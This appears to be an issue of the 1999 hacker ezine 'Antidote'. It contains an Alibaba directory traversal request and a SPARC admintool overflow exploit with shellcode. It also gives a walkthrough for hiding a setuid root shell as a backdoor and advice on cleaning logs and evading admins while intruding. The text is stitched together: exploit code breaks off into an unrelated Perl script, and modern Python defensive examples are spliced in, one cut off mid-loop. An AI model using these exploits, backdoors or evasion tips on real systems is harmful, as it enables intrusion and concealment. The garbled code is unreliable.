Volume 2 Issue 4 5/16/99

Antidote
http://www.thepoison.org/antidote

------------------------------

Here is another issue of Antidote. Right now we have over 415 subscribers and we are getting more every day. We are very sorry to say that we are not going to send Antidote as an attachment anymore, because we have gotten so many subscribers that our mail server goes ape shit when we send them out (we don't have a mail server just for Antidote). What we are going to do instead is e-mail everyone the URL where they can download the new issue of Antidote. So you will start receiving an e-mail about every week telling you that a new issue of Antidote has been released and where you can get it. Sorry if this is an inconvenience to anyone, but it is such a hassle to send this as an attachment because of the mail server. The last issue that we sent as an attachment took us over two and a half hours to send to all of the subscribers because of problems, and the mail server kept crashing because of it. At Antidote we never ask anything from anyone except articles, which are optional, but now, if you could, please visit our sponsor, because we have to pay for the domain (www.thepoison.org) and it is getting too expensive to keep up, though we don't want to take it down.
So please take two seconds of your time, go to the following URL and click on our sponsor: http://www.thepoison.org/popup.html The reason we don't link the sponsor directly from here is that they have a referral page where you type in the URL of the page that will carry the link, and if the referral does not come from that page, the 'hit' does not count. So please go to that URL and click on our sponsor!

--=\\Contents\\=--

0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Alibaba 2.0
1.02 - CIH has gone 'phoney'
1.03 - Admintool Overflow
1.04 - Corel Virus
1.05 - Check.pl
1.06 - SSHD Root
2.00 - Misc
2.01 - Root : Anytime
2.02 - How Not to Get Caught
2.03 - Trojan Ports

------------------------------

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically, is current news and happenings in the underground world. We aren't going to teach you how to hack, but we will supply you with current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack, you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are the questions that we seem to receive a lot, our "Frequently Asked Questions". Please read this before e-mailing us with questions; if your question isn't on here or doesn't make sense, then you can e-mail us with it.

> What exactly is "Antidote"?

See section 0.01 for a complete description.

> I find Antidote is not suited for the beginner and does not teach the basics, why is that?
Antidote is for everyone. All we are, basically, is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles in here are received second-hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?

Yes. If you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive Antidote the second we release it, and the e-mail will contain a hyperlink to the URL where you can download the current issue.

> If I want to submit something, are there any 'rules'?

Please see section 0.04 for a complete description.

> If I submitted something, can I remain anonymous?

Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in a future issue of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can; we take information written by anyone, regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general.
If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here; we are sorry for the misunderstanding. Well, here are the shout outs:

Lord Oak
EazyMoney
Duece
Astral
Black Magick
oX1dation
Forlorn
Retribution
0dnek
www.thepoison.org
Serial Killer
Jaynus

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.04 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine. If you have any questions about what is "acceptable" and what is not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask whether someone has already written on a topic, so that you don't waste your time writing something that won't be published. An example of this would be: Joe sends us an e-mail on hacking Hotmail accounts on Thursday, and then Bill sends us an e-mail on hacking Hotmail accounts on Sunday; we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue!
If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).

------------------------------

http://www.403-security.org - For the latest hacks and news

1.01 --=\\Alibaba 2.0\\=--

I've found a security hole in the web server Alibaba 2.0 (the latest version). I haven't tried it on any other version. Here's an example: If you install it so the web root is located in c:\alibaba\HtmlDocs\ you can send a URL:

http://www.server.se/../../winnt/file.txt

and get the "file.txt" file. This works all over the disk Alibaba is installed on. If directory browsing isn't allowed you have to know the pathname of the file you want. If directory browsing is allowed you can start at the disk root directory, but you have to enter the directories by hand when browsing, because the server will assume they are located in the web root, so if you just click around all you'll get is lots of 404's.

/Arne Vidstrom

- comment for Russ to be removed when posting out on the list - I haven't contacted the vendor at all.

------------------------------

1.02 --=\\CIH has gone 'phoney'\\=--

[www.cnn.com]

A fast-traveling rumor that the Chernobyl virus that melted down at least 600,000 computers worldwide last month would wreak havoc on cellular phones in Lebanon on Saturday tangled telephone lines and briefly shut down Lebanon's telephone network. Lebanese flipped off their mobiles and picked up traditional telephones to warn friends and family to do the same. The panic in this cellular-loving country overloaded the network, disrupting service for a few minutes, Ad-Diyar daily newspaper reported Sunday.

Losses from the drop in cellular calls amounted to $30,000, the newspaper reported. The Chernobyl virus, timed to strike computers on the April 26 anniversary of the Chernobyl nuclear disaster, tries to erase a computer's hard drive and write gibberish into system settings. Parliament was considering an investigation into the source of the rumor, which Lebanon's two cellular companies scrambled in vain to debunk as technically implausible. Reporters tried Saturday to reach the Lebanese communications minister about the scare, according to the London-based Al-Hayat newspaper. His two cellular phones, however, were shut off.

http://www.cnn.com/WORLD/meast/9905/09/lebanon.cell.hoax.ap/

------------------------------

1.03 --=\\Admintool Overflow\\=--

/*=============================================================================
   admintool Overflow Exploits (for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)

   [usage]
   % setenv DISPLAY yourdisplay   (ex. setenv DISPLAY 192.168.0.100:0.0)
   % gcc ex_admintool.c           (This example program)
   % a.out
   ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk] -> Directory: /tmp -> [Ok] )
   # In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ADJUST1   2
#define ADJUST2   1
#define BUFSIZE1  1000
#define BUFSIZE2  800
#define OFFSET    3600
#define OFFSET2   400
#define PKGDIR    "mkdir /tmp/EXP"
#define PKGINFO   "/tmp/EXP/pkginfo"
#define PKGMAP    "/tmp/EXP/pkgmap"
#define NOP       0xa61cc013

char exploit_code[] =
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
    "\x94\x10\x20\x10\x94\x22\xa0\x10"
    "\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08";

/* Return the current stack pointer: on SPARC a function's return value
   travels in %i0, so moving %sp into it is all that is needed. */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;

main()
{
    system(PKGDIR);
    putenv("LANG=");
    if ((fp=fopen(PKGMAP,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGMAP);
        exit(1);
    }
    fclose(fp);
    if ((fp=fopen(PKGINFO,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGINFO);
        exit(1);
    }
    fprintf(fp,"PKG=");
    /* Guess the return address from our own stack, then bump it until none of
       its four bytes is zero: a NUL would terminate the pkginfo string early. */
    ret_adr=get_sp()-OFFSET;
    while ((ret_adr & 0xff000000) == 0 ||
           (ret_adr & 0x00ff0000) == 0 ||
           (ret_adr & 0x0000ff00) == 0 ||
           (ret_adr & 0x000000ff) == 0)
        ret_adr += 4;
    printf("Jumping address = %lx\n",ret_adr);
    /* PKG= value: the return address repeated as big-endian words, with a
       few leading 'a' bytes so the words land on the alignment admintool uses. */
    memset(x,'a',4);
    for (i = ADJUST1; i < 1000; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >>8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE1]=0;
    fputs(x,fp);
    fprintf(fp,"\n");
    fprintf(fp,"NAME=");
    /* NAME= value: a sled of SPARC NOPs, again written big-endian */
    memset(x,'a',4);
    for (i = ADJUST2; i < BUFSIZE2; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0; i$MAXLEVEL) {
        print STDERR "ERROR: Max recursion met - directory structure deeper than $MAXLEVEL directories. That's bad. You can change the default in the script, or you can see if you can find any circular symlinks that are causing the problem.
        Check the end of your output for clues.\n\n";
        die "ERROR: Max-eval-depth error.\n";
    }

    opendir HANDLE, "$dirname" or return(-1);
    my @allfiles = readdir HANDLE;
    closedir HANDLE;
    # print "Reading info on \"$dirname\"...\n";

    TORTURE: foreach my $file (@allfiles) {
        my $foobar;
        if($dirname eq "/") {
            $foobar = $dirname . $file;
        } else {
            $foobar = $dirname . "/" . $file;
        }
        # print "\"$foobar\" level $level\n";

        if(($file eq ".") or ($file eq "..")) {
            # Go on your merry way...ignore this one.
        }
        # If the file is writeable, and doesn't belong to the user running
        # this script, then it gets reported.
        elsif((-W $foobar) and (not (-O $foobar))) {    # File is writeable && !owned
            # If it's a directory, report it as such.
            if(-d $foobar) {                            # File is a directory
                print "\"$foobar\" ### WRITEABLE DIR\n";
            } else {
                my $fileinfo=`ls -l "$foobar"`;
                chomp($fileinfo);
                print "\"$fileinfo\" ### WRITEABLE\n";
            } # End else
        } # End elsif
        elsif(-l $foobar) {
            # my $fileinfo=`ls -l "$foobar"`;
            # chomp($fileinfo);
            # print "\"$fileinfo\" ### SYMLINK\n";
            # Symlink evilness. Especially with GNOME. :(
        }
        elsif(-d $foobar) {                             # File is a directory
            # File is a directory - recurse through it
            # DEBUG: print "Entering \"$file\" coming from \"$dirname\"\n";
            my $tmp=dirinfo($foobar, ($level+1));
            if($tmp == -1) {
                print "Directory $foobar not readable with your sorry UID.\n";
            }
        }
        elsif(-u $foobar) {                             # File is SUID
            my $fileinfo=`ls -l "$foobar"`;
            chomp($fileinfo);
            print "$fileinfo ### SUID\n";
        }
        elsif(-g $foobar) {                             # File is SGID
            my $fileinfo=`ls -l "$foobar"`;
            chomp($fileinfo);
            print "$fileinfo ### SGID\n";
        }
        elsif(-k $foobar) {                             # File is sticky
            my $fileinfo=`ls -l "$foobar"`;
            chomp($fileinfo);
            print "$fileinfo ### STICKY\n";
        }
        else {
            # DEBUG2: print "\"$foobar\" doesn't look very interesting to me.\n";
        }
    } # End foreach
} # End dirinfo

------------------------------

1.06 --=\\SSHD Root\\=--

When was the last time you rebuilt all privileged (`suid root') applications when upgrading a unix system, just in case?
I'm pretty sure one can find `small print' that demands this, however I'm equally sure that hardly any system manager does so, since problems seem to occur _very_ rarely. Here's a neat one: Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a not-so-common platform (nothing really security-relevant, machine used for raw speed only, users just being accustomed to that sort of login). Said platform (featuring a particularly elaborate user data base) requires some special calls (simple calling sequences) to be done during `login' - no problem, `sshd' knows about them, although not explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not allow `root' logins from the outside. What other harm could it possibly do? Upgrade has to occur somewhat in a hurry, release documentation isn't on-site, but procedures are known well enough. S.M. asks the manufacturer's support representative if special precautions have to be taken, "errr, not that I'd think so". S.M. installs new version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to work the same as before. A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters `su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for a password. Minutes later, S.M. recognizes that `su' would never ask for a password, when the parent process had been created via `sshd' ... in spite of no other visible peculiarities with that process. A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the problem. Quite a few years ago, when I saw the first mention of `ssh', I commented "If you're a bank, you don't buy your safe at a flea market; if you're not, you might be better off without a safe". Maybe there's _some_ truth in it, after all. Imagine uSoft going open source, and no-one going to have a look at it... 
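Back to the Alibaba hole in 1.01. What Arne describes is a directory traversal: the server glues the request path onto the document root and lets the filesystem resolve the ".." components, so the request climbs out of HtmlDocs. The Python below is an added example written for this issue; it is not Alibaba's code or anything from Arne's post. The document root /srv/alibaba/HtmlDocs and the request list are constructed (the post's server sat at c:\alibaba\HtmlDocs\ on NT). It shows the naive resolution next to a hardened one, and the hardened one also covers two variants the post does not mention: percent-encoded dots and backslash separators.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root; the post used c:\alibaba\HtmlDocs\ on NT.
WEBROOT = "/srv/alibaba/HtmlDocs"


def naive_resolve(webroot, url_path):
    """What a server with the 1.01 bug effectively does: glue the request
    path onto the document root and let the filesystem walk the '..'s.
    Returns the path the OS would actually open."""
    joined = posixpath.join(webroot, url_path.lstrip("/"))
    return posixpath.normpath(joined)


def safe_resolve(webroot, url_path):
    """Hardened resolution: decode once, treat a backslash as a separator
    too, normalise, then insist the result is the root or lies strictly
    beneath it. Returns None for anything that escapes."""
    decoded = unquote(url_path)            # %2e%2e -> ..
    if "\x00" in decoded:                  # a NUL would truncate a C path
        return None
    decoded = decoded.replace("\\", "/")   # NT accepts both separators
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare against root + "/" so that /srv/alibaba/HtmlDocs-old is not
    # accepted as a prefix match of /srv/alibaba/HtmlDocs.
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Constructed requests: the one from the post plus a few variants.
REQUESTS = [
    "/index.html",
    "/sub/../index.html",
    "/../../winnt/file.txt",
    "/%2e%2e/%2e%2e/winnt/file.txt",
    "/..\\..\\winnt\\file.txt",
    "/../HtmlDocs-old/secret.txt",
]


def compare(webroot=WEBROOT, requests=REQUESTS):
    """Return {request: (naive result, hardened result)} for each request."""
    return {r: (naive_resolve(webroot, r), safe_resolve(webroot, r)) for r in requests}


if __name__ == "__main__":
    for req, (naive, safe) in compare().items():
        print(f"{req:32} naive -> {naive:40} hardened -> {safe}")
```

Normalising the path is necessary but not sufficient on a real server: after opening the file, take its realpath and repeat the containment check, so a symlink inside the web root cannot point outside it. Decode the path exactly once, the same way the server does when it opens the file; decoding twice rejects legitimate names containing a percent sign and still does not match what the filesystem sees.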
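Check.pl in 1.05 walks the tree reporting world-writable, SUID and SGID files, and the trick in 2.01 below (a hidden, setuid copy of /bin/sh tucked into a home directory or /tmp) is exactly what such a walk should catch. The Python below is an added example, not the zine's script and not something you need root to run. It goes one step past "print every SUID file": each privileged file is compared against a baseline of expected setuid binaries, hashed against known system shells, and flagged if its name is hidden or its parent directory is world-writable. The baseline, the stand-in shell and the directory tree are all constructed inside the example; on a real host you would hash the real /bin/sh and friends and take the baseline from the package manager or a clean snapshot.

```python
import hashlib
import os
import shutil
import stat
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_privileged(root):
    """Yield (path, stat_result) for every regular file with SUID or SGID set.
    lstat is used so a symlink is never followed out of the tree."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st


def classify(path, baseline, shell_hashes):
    """Reasons a privileged file deserves a second look (empty list = expected)."""
    reasons = []
    if path not in baseline:
        reasons.append("not in baseline")
    if os.path.basename(path).startswith("."):
        reasons.append("hidden name")
    if os.stat(os.path.dirname(path)).st_mode & stat.S_IWOTH:
        reasons.append("world-writable parent dir")
    if sha256_file(path) in shell_hashes:
        reasons.append("byte-identical to a known shell")
    return reasons


def audit(root, baseline, shell_paths):
    """Map each suspicious SUID/SGID file under root to its list of reasons."""
    shell_hashes = {sha256_file(p) for p in shell_paths if os.path.isfile(p)}
    findings = {}
    for path, _st in find_privileged(root):
        reasons = classify(path, baseline, shell_hashes)
        if reasons:
            findings[path] = reasons
    return findings


def demo():
    """Recreate the 2.01 scenario in a scratch directory (all constructed)
    and audit it. Returns findings keyed by path relative to the scratch root."""
    top = tempfile.mkdtemp(prefix="suidaudit-")
    try:
        bindir = os.path.join(top, "bin")
        os.mkdir(bindir)
        os.chmod(bindir, 0o755)
        shell = os.path.join(bindir, "sh")              # stand-in for /bin/sh
        with open(shell, "wb") as f:
            f.write(b"#!/bin/sh\n# stand-in for the system shell (constructed)\n")
        os.chmod(shell, 0o755)
        su = os.path.join(bindir, "su")                 # a legitimately setuid binary
        with open(su, "wb") as f:
            f.write(b"stand-in for a packaged setuid binary (constructed)\n")
        os.chmod(su, 0o4755)
        hidden = os.path.join(top, "home", "forlorn", ".here")
        os.makedirs(hidden)
        os.chmod(hidden, 0o777)                         # the article's 'chmod 777'
        backdoor = os.path.join(hidden, ".jk")
        shutil.copyfile(shell, backdoor)                # 'cp /bin/sh ...; mv sh .jk'
        os.chmod(backdoor, 0o4755)                      # the article's 'chmod 4777'
        findings = audit(top, baseline={su}, shell_paths=[shell])
        return {os.path.relpath(p, top): r for p, r in findings.items()}
    finally:
        shutil.rmtree(top, ignore_errors=True)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "###", ", ".join(reasons))
```

The packaged su in bin/ is setuid too but produces no finding, which is the point of the baseline: the interesting output is the delta, not the list. Hashing against the system shells catches the copy even after it has been renamed, and the parent-directory check is what turns "some SUID file in a home directory" into "someone staged this".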
------------------------------

http://www.nudehackers.com

2.01 --=\\Root : Anytime\\=--

After gaining root access to a server you always risk the chance of losing access. The admin may change the password or fix the hole allowing a root shell. Well, now you have a way to keep that root shell. The admin can change the password or fix the security hole; as long as you have local access, you have root access.

Down to the nitty gritty. In the /bin dir there is a file named sh. This is the actual shell. By running this the user will have shell access as the user that owns it. Once you have root on the computer, after you fix the logs and the .bash_history, go to the /bin dir and copy sh to a dir with permissions of 777 (or one that you have access to). After you have finished, go back and change permissions on the dir to 700 so no one else can access this without knowing the file name and where it is. If you have an account on the box, simply create a dir inside your home dir where you can hide it. If you don't have access then you can copy it to the /tmp dir or even make a different one and hide it. To hide the dir, instead of a name such as HERE, use .HERE. The period in front will hide it from ls (using ls -a will show it).

Now once you have sh in that dir, chmod it to 4777. This sets the setuid bit, allowing it to set the userid of the person who ran the file to the userid of the owner of the file, in this case root. Now it is time to hide this file. In case your dir is found or viewed, hide the file: again, instead of leaving the name sh, name it .sh, or even go farther and name it something other than sh so it's not as noticeable. Now you have a ROOT SHELL any time.
This also works with users other than root. Here's a lil example:

[root@hacked box]$ mkdir /home/forlorn/.here
[root@hacked box]$ chmod 777 /home/forlorn/.here
[root@hacked box]$ cp /bin/sh /home/forlorn/.here
[root@hacked box]$ cd /home/forlorn/.here
[root@hacked box]$ chmod 4777 sh
[root@hacked box]$ mv sh .jk
[root@hacked box]$ su forlorn
password:
[forlorn@hacked box]$ cd .here
[forlorn@hacked box]$ ./.jk
bash# whoami
root

heh :) rootshell anytime

Forlorn
forlorn@Nudehackers.com

------------------------------

2.02 --=\\How Not to Get Caught\\=--

Lots have said it. "I am scared to hack because I might get caught and go to jail!!!", etc, etc, etc. You've all seen it before. There are plenty of ways to be cautious and not get caught (or to get on the public's and media's good side if you do).

When hacking any type of *nix system, always check /etc/syslog.conf and make sure all the logs were taken care of. A good sys admin will log in more places than /var/log/. Ya know? Among other things, DON'T EVER DELETE OR MODIFY UNNECESSARY FILES. EVER. Of course, unless the admin has completely made a fool of you, then feel free to do a rm -rf /* if you like. =P

If you are patient, you could always commence your hack of a machine/network over a period of time to lower suspicion. Lots of logs from one night of you attacking would be noticed more easily by an admin/log-checker than logs spread over a period of two weeks or so. Attacking patiently will reduce the chances of you being noticed while trying to gain access.

This is a mistake many new skool hackers have made: bragging about your hacks. Posting on 500 usenet groups and BBSes saying "Y0 F00LZ I H4K0R3D FBI.GOV" will get you busted real fast, if you catch my drift. Keep your major hacks to yourself and/or your group. You should have pride in your hacks, and knowing that no one else knows you are there is a great feeling; you know you have truly gained access to a computer as a ghost.
Of course, you could just be having a bad day, and you forget to clean one little thing out and the admin notices. First off, the action taken against a hacker is greatly exaggerated. An admin of a machine in the middle of bumfuck Ohio mailing your ISP about a hack won't do much to ya. Most ISPs, when told about criminal activity, just cancel your account, and that's it. Unless it is federal, international, or has something to do with banks or large corps. Let's just say, you won't go to jail for hacking anything worth under $50k. =) heh.

Now, if it is big, and you get caught hacking, say, looking at plans for the new F-22 stealth fighter circuitry, you will go to court swiftly. This is when your not deleting or modifying comes in handy. The media will glorify you as a victim if you just simply say, "I was reading some very interesting information about the unclassified planes". They will give you the public's love, and that is good! heh.

Out of all my experience, the above are the most important things I have learned to do and abide by. Remember, more than 100 times as many new skool (malicious) hackers are caught as us oldskool hackers!

Jaynus
http://Security.Jaynus.Com

------------------------------

2.03 --=\\Trojan Ports\\=--

After seeing several questions about traffic directed at ports such as 31337 and 12345, I've put together a list of all trojans known to me and the default ports they use. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on.
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack'99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil

You'll find the list at the following address: http://www.simovits.com/nyheter9902.html (still in Swedish, but it will be translated in the near future). To help anyone detect trojan attacks, I'm planning to add information about the original names of the executables, their size, where they usually hide, and the names of any helpfiles they may use. I will also add tools, or links to tools, that may be of assistance. Feel free to get back to me with any comments or suggestions. If you find new trojans I'd love to get my hands on them, but please mail me first, as I don't need more than one copy. If you have live experience of trojan attacks I'm interested to read about your findings.

Joakim
joakim.von.braun@risab.se

------------------------------

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art is done by Lord Oak and permission is needed from him before using.
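A footnote to Joakim's list in 2.03. The list is most useful when it is run against something, so the Python below is an added example (not part of Joakim's post and not his tool) that matches firewall log lines against a subset of his table. The log lines are constructed in the netfilter LOG format (SRC=, DST=, PROTO=, SPT=, DPT=, followed by bare TCP flag names); adapt parse_fw_line for any other format. Two points the list alone does not make: only a bare SYN, or a UDP datagram, opens a connection to the DPT, so on reply packets the DPT is the client's ephemeral port and "DPT=1999" there is not BackDoor; and below port 1024 the same port is a normal service (FTP, telnet, SMTP, HTTP), so a hit there is only a weak signal on its own.

```python
import re

# Subset of the default-port table in 2.03 above; extend it from the full list.
TROJAN_PORTS = {
    21: ["Blade Runner", "Doly Trojan", "Fore", "Invisible FTP", "WebEx", "WinCrash"],
    23: ["Tiny Telnet Server"],
    80: ["Executor"],
    555: ["Ini-Killer", "Phase Zero", "Stealth Spy"],
    1999: ["BackDoor"],
    5000: ["Sockets de Troie"],
    6670: ["DeepThroat"],
    12345: ["GabanBus", "NetBus"],
    12346: ["GabanBus", "NetBus"],
    20034: ["NetBus 2 Pro"],
    21544: ["GirlFriend"],
    31337: ["Back Orifice"],
    31338: ["Back Orifice", "DeepBO"],
    65000: ["Devil"],
}

FIELD = re.compile(r"\b(SRC|DST|PROTO|SPT|DPT)=(\S+)")


def parse_fw_line(line):
    """Extract the fields we need from a netfilter LOG line; None if it is not one."""
    fields = dict(FIELD.findall(line))
    if not {"SRC", "DST", "PROTO", "DPT"}.issubset(fields):
        return None
    # TCP flag names (SYN, ACK, PSH, ...) are printed as bare words after DPT=.
    tail = line.split("DPT=", 1)[1]
    flags = {tok for tok in tail.split() if "=" not in tok}
    return {"src": fields["SRC"], "dst": fields["DST"], "proto": fields["PROTO"].upper(),
            "dport": int(fields["DPT"]), "flags": flags}


def is_new_connection(pkt):
    """A bare SYN (or any UDP datagram) is the only packet whose DPT is the
    service port; replies and established segments carry the ephemeral port."""
    if pkt["proto"] == "UDP":
        return True
    return "SYN" in pkt["flags"] and "ACK" not in pkt["flags"]


def lookup(dport):
    """Trojan names for a destination port plus a confidence level, or None."""
    names = TROJAN_PORTS.get(dport)
    if not names:
        return None
    return names, ("low" if dport < 1024 else "high")


def scan(lines):
    """Return one finding per new connection whose DPT is in the table."""
    findings = []
    for line in lines:
        pkt = parse_fw_line(line)
        if pkt is None or not is_new_connection(pkt):
            continue
        hit = lookup(pkt["dport"])
        if hit is None:
            continue
        names, confidence = hit
        findings.append({"src": pkt["src"], "dst": pkt["dst"], "proto": pkt["proto"],
                         "dport": pkt["dport"], "names": names, "confidence": confidence})
    return findings


# Constructed sample log lines in netfilter LOG format (addresses from the
# documentation ranges, timestamps invented).
SAMPLE_LOG = [
    "May 16 03:12:01 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.20 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=UDP SPT=1045 DPT=31337 LEN=40",
    "May 16 03:12:07 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.20 LEN=48 TOS=0x00 PREC=0x00 TTL=52 ID=1 DF PROTO=TCP SPT=1046 DPT=12345 WINDOW=8192 RES=0x00 SYN URGP=0",
    "May 16 03:12:09 fw kernel: IN=eth0 OUT= SRC=192.0.2.20 DST=203.0.113.5 LEN=40 TOS=0x00 PREC=0x00 TTL=64 ID=2 DF PROTO=TCP SPT=12345 DPT=1999 WINDOW=8192 RES=0x00 ACK URGP=0",
    "May 16 03:12:11 fw kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.20 LEN=48 TOS=0x00 PREC=0x00 TTL=118 ID=3 DF PROTO=TCP SPT=33000 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0",
    "May 16 03:12:13 fw kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.20 LEN=48 TOS=0x00 PREC=0x00 TTL=118 ID=4 DF PROTO=TCP SPT=33001 DPT=443 WINDOW=8192 RES=0x00 SYN URGP=0",
    "May 16 03:12:15 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.20 LEN=52 TOS=0x00 PREC=0x00 TTL=52 ID=5 DF PROTO=TCP SPT=1046 DPT=12345 WINDOW=8192 RES=0x00 ACK PSH URGP=0",
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
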